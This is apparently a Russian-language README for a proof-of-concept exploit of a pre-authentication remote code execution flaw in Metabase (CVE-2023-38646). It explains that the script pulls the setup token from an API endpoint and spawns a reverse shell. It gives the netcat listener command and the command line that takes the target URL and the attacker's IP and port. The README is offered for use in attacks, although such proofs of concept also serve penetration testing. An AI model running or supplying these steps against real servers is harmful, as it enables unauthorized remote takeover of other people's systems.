
Metabase Pre-Auth RCE POC
Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере. Я написал скрипт для непосредственного получения reverse shell на машине атакующего.
Скрипту требуются URL цели, IP и порт атакующего. Указывать setup token не требуется для этого эксплойта, так как скрипт пытается получить его из /api/session/properties.
Убедитесь, что на машине атакующего запущен netcat listener, используя следующую команду:
nc -nlvp {Port}
Запустите POC-скрипт со следующими параметрами:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
